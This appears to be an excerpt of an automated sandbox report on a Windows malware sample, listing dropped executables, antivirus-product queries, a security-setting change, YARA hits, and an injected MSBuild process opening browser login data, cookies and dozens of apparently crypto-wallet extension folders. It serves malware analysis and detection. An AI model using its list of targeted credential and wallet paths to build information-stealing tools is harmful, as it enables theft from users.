Source: Af3hqfTjFh.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000002.996513045.0000000000C98000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, rapes.exe, 0000000C.00000002.991548172.0000000000CF8000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Program Manager
Source: Af3hqfTjFh.exe Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E00698 cpuid 0_2_00E00698
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: EnumSystemLocalesW, 22_2_00007FF748F4EAE0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW, 22_2_00007FF748F4EC80
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 22_2_00007FF748F4E4C8
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW, 22_2_00007FF748F4EB78
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW, 22_2_00007FF748F4EE18
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: EnumSystemLocalesW, 22_2_00007FF748F49550
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 22_2_00007FF748F4ED68
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW, 22_2_00007FF748F48DD8
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 22_2_00007FF748F4E898
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: EnumSystemLocalesW, 22_2_00007FF748F4E7C8
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: EnumSystemLocalesW, 25_2_00007FF73879EAE0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW, 25_2_00007FF73879EB78
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 25_2_00007FF73879E4C8
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW, 25_2_00007FF73879EC80
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW, 25_2_00007FF738798DD8
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: EnumSystemLocalesW, 25_2_00007FF738799550
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 25_2_00007FF73879ED68
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW, 25_2_00007FF73879EE18
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: EnumSystemLocalesW, 25_2_00007FF73879E7C8
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 25_2_00007FF73879E898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352670101\466f8e521c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352670101\466f8e521c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352680101\d6a397c01b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352680101\d6a397c01b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352700101\EPTwCQd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10352700101\EPTwCQd.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041590101\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041590101\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041600101\please18.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041600101\please18.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041870101\f4d01cf3f8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041870101\f4d01cf3f8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041880101\01ea7855d3.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10041880101\01ea7855d3.exe VolumeInformation
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E3D21C GetLocalTime, 0_2_00E3D21C
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E3D27A GetUserNameW, 0_2_00E3D27A
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DE42DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
Source: Null.44.dr Binary or memory string: processed file: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: Null.44.dr Binary or memory string: processed file: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 41.0.amnew.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.0.futors.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.futors.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 43.0.futors.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.amnew.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.956842128.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.991468562.0000000000B01000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.996423786.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.916472525.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.949456172.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.955918275.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1336929866.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\amnew[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe, type: DROPPED
Source: Yara match File source: 24.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.1569736725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
